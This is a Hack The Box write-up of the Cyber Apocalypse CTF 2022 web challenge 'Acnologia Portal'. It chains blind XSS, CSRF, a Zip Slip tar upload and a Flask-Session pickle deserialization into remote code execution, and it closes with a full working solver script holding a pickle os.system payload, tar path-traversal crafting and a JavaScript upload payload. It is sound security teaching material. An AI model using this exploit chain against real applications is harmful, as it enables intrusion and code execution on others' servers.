Write-Ups

13 min read

CA CTF 2022: Exploiting Zip Slip and Pickle Deserialization - Acnologia Portal

Exploiting Zip Slip and Pickle Deserialization, Rayhan0x01 shares his write-up of Acnologia Portal from Cyber Apocalypse CTF 2022.

Rayhan0x01 avatar

Rayhan0x01,
Jan 15
2022

In this write-up, we'll go over the web challenge Acnologia Portal, rated as medium difficulty in the Cyber Apocalypse CTF 2022. The solution requires exploiting a blind-XSS vulnerability and performing CSRF to upload a zip file for arbitrary file injection, crafting Flask-Session cookie for deserialization to get remote code execution.

Challenge Description 📄

Bonnie has confirmed the location of the Acnologia spacecraft operated by the Golden Fang mercenary. Before taking over the spaceship, we need to disable its security measures. Ulysses discovered an accessible firmware management portal for the spacecraft. Can you help him get in?

The application at-a-glance 🔍

The application homepage displays a login form and a link to the registration page. Since we don't have an account, we can create an account via the registration page and log in. After logging in, the application redirects to the following dashboard page:

We can click one of the "Report A Bug" buttons which brings up a form to submit a message:

Submitting an issue sends the following API request to the backend:

That is all the accessible features in this web application as a regular user. Since the source code is given for this application, we can take a look at the application routing from the blueprints/route.py file and see all the endpoints available:

@web.route('/', methods=['GET'])
def login():
...
 
@api.route('/login', methods=['POST'])
def user_login():
...
 
@api.route('/register', methods=['POST'])
def user_registration():
...
 
@web.route('/dashboard')
@login_required
def dashboard():
...
 
@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
...
 
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
...
 
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
...
 
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
...
 
@web.route('/logout')
@login_required
def logout():
...

It looks like there are additional endpoints that only the admin user can access. Looking at the Dockerfile, we can see the flag is placed under /root/flag, and a binary named readflag is created and given SUID permissions to be executed as root. A new user account called www is created that runs the Flask web application:

# Copy flag
COPY flag.txt /root/flag
 
# Add readflag binary
COPY config/readflag.c /
RUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c
 
# add user
RUN adduser -D -u 1000 -g 1000 -s /bin/sh www
 
# Setup app
RUN mkdir -p /app
 
# Switch working environment
WORKDIR /app
 
# Add application
COPY challenge .
RUN chown -R www: /app/flask_session

This suggests the only way to get the challenge flag is to somehow gain remote code execution by exploiting the application and executing the readflag binary.

Finding blind XSS via source code review 🔬

To understand what is done with the reported issues we submit, we can start by reviewing the /firmware/report endpoint defined in the application/routes.py file:

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
   if not request.is_json:
       return response('Missing required parameters!'), 401
 
   data = request.get_json()
   module_id = data.get('module_id', '')
   issue = data.get('issue', '')
 
   if not module_id or not issue:
       return response('Missing required parameters!'), 401
 
   new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
   db.session.add(new_report)
   db.session.commit()
 
   visit_report()
   migrate_db()
 
   return response('Issue reported successfully!')
});

The reported issue content is saved to the database, and two different functions are called before returning the response. The visit_report() function defined in the application/bot.py launches a headless Chrome browser and authenticates as the admin user on the platform before visiting the /review endpoint:

<snip>
client = webdriver.Chrome(chrome_options=chrome_options)
client.set_page_load_timeout(5)
client.set_script_timeout(5)
 
client.get('http://localhost:1337/')
 
username = client.find_element_by_id('username')
password = client.find_element_by_id('password')
login = client.find_element_by_id('login-btn')
 
username.send_keys(current_app.config['ADMIN_USERNAME'])
password.send_keys(current_app.config['ADMIN_PASSWORD'])
login.click()
time.sleep(3)
 
client.get('http://localhost:1337/review')
 
time.sleep(3)
client.quit()

The review endpoint is protected by the is_admin wrapper defined in application/util.py that makes sure the visitor has the user IP 127.0.0.1 and the username is that of the ADMIN_USERNAME value:

def is_admin(f):
   @functools.wraps(f)
   def wrap(*args, **kwargs):
       if current_user.username == current_app.config['ADMIN_USERNAME'] and request.remote_addr == '127.0.0.1':
           return f(*args, **kwargs)
       else:
           return abort(401)
 
   return wrap

Checking the application/templates/review.html file, we see that the jinja2 templating engine filter safe is used on the user-supplied parameter issue:

<p class="card-text">Issue : {{ report.issue | safe }} </p>

As described in the Jinja2 templating docs, the value is marked safe, and no sensitive character is escaped leading to cross-site scripting vulnerability:

We can verify the XSS vulnerability by submitting an issue with the following XSS payload that tries to fetch the image link we control when the headless Chrome bot visits the /review endpoint:

The webhook.site website is a request logger service that provides a public link and stores and displays any requests made to that public link. Now that we can execute JavaScript as the "admin" user, we can interact with the other endpoints only accessible to the admin.

The Zip Slip attack via firmware upload 🤐

The /api/firmware/upload endpoint defined in application/routes.py is only accessible to the admin:

@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
   if 'file' not in request.files:
       return response('Missing required parameters!'), 401
 
   extraction = extract_firmware(request.files['file'])
   if extraction:
       return response('Firmware update initialized successfully.')
 
   return response('Something went wrong, please try again!'), 403

The endpoint accepts POST requests and calls the extract_firmware function defined in application/util.py with the uploaded file that first saves the file to the temporary directory of the system and checks whether the file is a tar file. If that's verified, it opens the file and extracts all the file content using the extractall() method:

def extract_firmware(file):
   tmp  = tempfile.gettempdir()
   path = os.path.join(tmp, file.filename)
   file.save(path)
 
   if tarfile.is_tarfile(path):
       tar = tarfile.open(path, 'r:gz')
       tar.extractall(tmp)
 
       rand_dir = generate(15)
       extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
       os.makedirs(extractdir, exist_ok=True)
       for tarinfo in tar:
           name = tarinfo.name
           if tarinfo.isreg():
               try:
                   filename = f'{extractdir}/{name}'
                   os.rename(os.path.join(tmp, name), filename)
                   continue
               except:
                   pass
           os.makedirs(f'{extractdir}/{name}', exist_ok=True)
       tar.close()
       return True
 
   return False

A root folder is created inside the /static/archives directory, where all the tar items are to be saved. The extracted tar items are then iterated and checked whether they are regular files or directories. If the tar item is a folder, it's created inside the root folder. Let's take a look at the documentation for the TarFile.extractall() method. We can see the following warning, which states it's possible to create files in arbitrary locations by specifying ".." in paths:

This vulnerability is widely known as the Zip Slip Vulnerability. We can craft an XSS payload that will perform cross-site request forgery (CSRF) by sending an API request to upload the tar file to that endpoint. The problem now is what file to overwrite to gain remote code execution!

Flask-Session cookie Pickle deserialization 🥒

If we launch the challenge application locally and inspect the /app directory, we will see that we don't have permission to write or modify any files in the application directory. However, the `flask_session` directory is owned by the www user, where we can create arbitrary files:

drwxrwxr-x    5 root     root          4096 May  9 16:28 application
drwxrwxr-x    1 www      www           4096 May 17 21:54 flask_session
-rw-rw-r--    1 root     root           185 May  9 16:28 run.py

Looking into the application/config.py file, we can see a few config keys related to the flask-session library:

SESSION_PERMANENT = False
SESSION_TYPE = 'filesystem'
SESSION_KEY_PREFIX = ''
SESSION_FILE_THRESHOLD = 20
SESSION_USE_SIGNER = False

From the flask-session documentation, the SESSION_USE_SIGNER key is described as follows:

Whether sign the session cookie sid or not, if set to True, you have to set flask.Flask.secret_key, default to be False

Since the SESSION_TYPE is set to filesystem, whenever we log in to the application, a new session file is created in the /app/flask_session folder. The filename is calculated as the MD5 hash of the session cookie sid. If we look at the source code of the flask-session library, we'll see the filesystem session type uses the class FileSystemSessionInterface:

class FileSystemSessionInterface(SessionInterface):
   """Uses the :class:`cachelib.file.FileSystemCache` as a session backend.
   .. versionadded:: 0.2
       The `use_signer` parameter was added.
   :param cache_dir: the directory where session files are stored.
   :param threshold: the maximum number of items the session stores before it
                       starts deleting some.
   :param mode: the file mode wanted for the session files, default 0600
   :param key_prefix: A prefix that is added to FileSystemCache store keys.
   :param use_signer: Whether to sign the session id cookie or not.
   :param permanent: Whether to use permanent session or not.
   """
 
   session_class = FileSystemSession

The FileSystemCache class from the cachelib library saves the session where the supplied key is SESSION_KEY_PREFIX appended with the session `sid` value. Looking into the FileSystemCache class:

 
class FileSystemCache(BaseCache):
   """A cache that stores the items on the file system.  This cache depends
   on being the only user of the `cache_dir`.  Make absolutely sure that
   nobody but this cache stores files there or otherwise the cache will
   randomly delete files therein.
   :param cache_dir: the directory where cache files are stored.
   :param threshold: the maximum number of items the cache stores before
                     it starts deleting some. A threshold value of 0
                     indicates no threshold.
   :param default_timeout: the default timeout that is used if no timeout is
                           specified on :meth:`~BaseCache.set`. A timeout of
                           0 indicates that the cache never expires.
   :param mode: the file mode wanted for the cache files, default 0600
   :param hash_method: Default hashlib.md5. The hash method used to
                       generate the filename for cached results.

The default hash_method used to generate the filename is MD5. So, if we provide a session cookie "session=ABC123" in our HTTP request, the application looks for the session file at /app/flask_session/MD5(ABC123) by default. The second thing to notice from this class is that the serializer used to save and load the data from the files is acquired by calling the FileSystemSerializer() class:

 
class BaseSerializer:
   """This is the base interface for all default serializers.
   BaseSerializer.load and BaseSerializer.dump will
   default to pickle.load and pickle.dump. This is currently
   used only by FileSystemCache which dumps/loads to/from a file stream.
   """
 
   def _warn(self, e: pickle.PickleError) -> None:
       logging.warning(
           f"An exception has been raised during a pickling operation: {e}"
       )
 
   def dump(
       self, value: int, f: _t.IO, protocol: int = pickle.HIGHEST_PROTOCOL
   ) -> None:
       try:
           pickle.dump(value, f, protocol)
       except (pickle.PickleError, pickle.PicklingError) as e:
           self._warn(e)
 
   def load(self, f: _t.BinaryIO) -> _t.Any:
       try:
           data = pickle.load(f)
       except pickle.PickleError as e:
           self._warn(e)
           return None
       else:
           return data
 
   """BaseSerializer.loads and BaseSerializer.dumps
   work on top of pickle.loads and pickle.dumps. Dumping/loading
   strings and byte strings is the default for most cache types.
   """
 
   def dumps(self, value: _t.Any, protocol: int = pickle.HIGHEST_PROTOCOL) -> bytes:
       try:
           serialized = pickle.dumps(value, protocol)
       except (pickle.PickleError, pickle.PicklingError) as e:
           self._warn(e)
       return serialized
 
   def loads(self, bvalue: bytes) -> _t.Any:
       try:
           data = pickle.loads(bvalue)
       except pickle.PickleError as e:
           self._warn(e)
           return None
       else:
           return data
<snip>
class FileSystemSerializer(BaseSerializer):
   """Default serializer for FileSystemCache."""

If we go back to the FileSystemCache class, on line 191, the FileSystemCache.get() method is defined that reads the file from the disk and checks the first four bytes of the file data. If the check is passed, the file content is deserialized with self.serializer.load() method:

 
def get(self, key: str) -> _t.Any:
   filename = self._get_filename(key)
   try:
       with self._safe_stream_open(filename, "rb") as f:
           pickle_time = struct.unpack("I", f.read(4))[0]
           if pickle_time == 0 or pickle_time >= time():
               return self.serializer.load(f)
   except FileNotFoundError:
       pass
   except (OSError, EOFError, struct.error):
       logging.warning(
           "Exception raised while handling cache file '%s'",
           filename,
           exc_info=True,
       )
   return None

We can read from the Pickle documentation that insecure deserialization can lead to remote code execution. To pass the four-bytes check, we can prepend four bytes of zeros before the serialized pickle payload:

def __reduce__(self):
    cmd = ('/readflag > /app/application/static/flag.txt')
    return os.system, (cmd,)
pickle_time = struct.pack("I", 0000)
pickled_payload = pickle_time + pickle.dumps(RCE())

Here's how to create the Zip Slip archive with the Pickle payload in Python:

zipslip = io.BytesIO()
tar = tarfile.open(fileobj=zipslip, mode='w:gz')
info = tarfile.TarInfo(f'../../../../../app/flask_session/{filename}')
info.mtime = time.time()
info.size = len(pickled_payload)
tar.addfile(info, io.BytesIO(pickled_payload))
tar.close()

Preparing the final exploit sorcery 🧙

We'll use the cross-site scripting vulnerability to perform CSRF on the /api/firmware/upload endpoint to upload the Zip Slip payload for extraction. The extraction will place the pickle serialized RCE payload in the flask_session directory. Finally, we'll trigger the deserialization by visiting the application with a session cookie sid that matches the md5 filename of the payload. Here's the full-chain solver script:

#!/usr/bin/env python3
import sys, requests, base64, time, tarfile, io, os, pickle, hashlib, struct

hostURL = 'http://127.0.0.1:1337'               # Challenge host URL
userName = f'rh0x01'                            # new username
userPwd = f'rh0x01'                             # new password

def register():
    jData = { 'username': userName, 'password': userPwd }
    req_stat = requests.post(f'{hostURL}/api/register', json=jData).status_code
    if not req_stat == 200:
        print("Something went wrong! Is the challenge host live?")
        sys.exit()

def login():
    jData = { 'username': userName, 'password': userPwd }
    authCookie = requests.post(f'{hostURL}/api/login', json=jData).cookies.get('session')
    if not authCookie:
        print("Something went wrong while logging in!")
        sys.exit()
    return authCookie

def prepare_zipslip(filename):
    class RCE:
        def __reduce__(self):
            cmd = ('/readflag > /app/application/static/flag.txt')
            return os.system, (cmd,)
    pickle_time = struct.pack("I", 0000)
    pickled_payload = pickle_time + pickle.dumps(RCE())

    zipslip = io.BytesIO()
    tar = tarfile.open(fileobj=zipslip, mode='w:gz')
    info = tarfile.TarInfo(f'../../../../../app/flask_session/{filename}')
    info.mtime = time.time()
    info.size = len(pickled_payload)
    tar.addfile(info, io.BytesIO(pickled_payload))
    tar.close()

    return base64.b64encode(zipslip.getvalue()).decode()


print('[+] Signing up a new account..')
register()

print('[~] Logging in to acquire session cookie..')
cookie = login()

print('[+] Preparing zipslip payload file with matching cookie sid..')
sid = 'rayhan0x01'
filename = hashlib.md5(sid.encode()).hexdigest()
b64_file = prepare_zipslip(filename)

print('[+] Preparing the XSS payload to upload the zipslip..')
xss_payload = """
<script>
const b64Data="%s"
const byteCharacters = atob(b64Data);
const byteArrays = [];
const sliceSize=512;
const contentType='multipart/form-data';
for (let offset = 0; offset < byteCharacters.length; offset += sliceSize) {
const slice = byteCharacters.slice(offset, offset + sliceSize);

const byteNumbers = new Array(slice.length);
for (let i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}

const byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}

const blob = new Blob(byteArrays, {type: contentType});

var formData = new FormData();
formData.append('file', blob, 'rh0x01.tar.gz');

var xhr = new XMLHttpRequest();
xhr.open('POST','/api/firmware/upload', true);
xhr.send(formData);
</script>
""" % b64_file

print('[+] Sending bug report with XSS payload..')
requests.post(
    f'{hostURL}/api/firmware/report',
    cookies={"session": cookie},
    json={'module_id': 1, 'issue': xss_payload}
)

print('[+] Triggering Pickle rce..')
requests.get(f'{hostURL}/dashboard',cookies={"session": sid})

flag = ''
while not flag:
    flag_resp = requests.get(f'{hostURL}/static/flag.txt')
    if flag_resp.status_code == 200:
        flag = flag_resp.text
    time.sleep(5)

print(f'[+] Flag: {flag}')

And that's a wrap for the write-up of this challenge! The challenge is currently available to play on Hack The Box platform here.

Challenge Unintendeds 💔

  • The application directory was owned by the www user allowing the Zip Slip vulnerability to overwrite the HTML template files to gain RCE via Jinja2 SSTI. We patched it by setting the owner of the application directory to root.

  • Malicious archive with Symlink to the flag file allowed reading the flag without RCE. We patched it by adding a readflag binary with SUID permissions and moving the flag to /root/flag.

Hack The Blog

The latest news and updates, direct from Hack The Box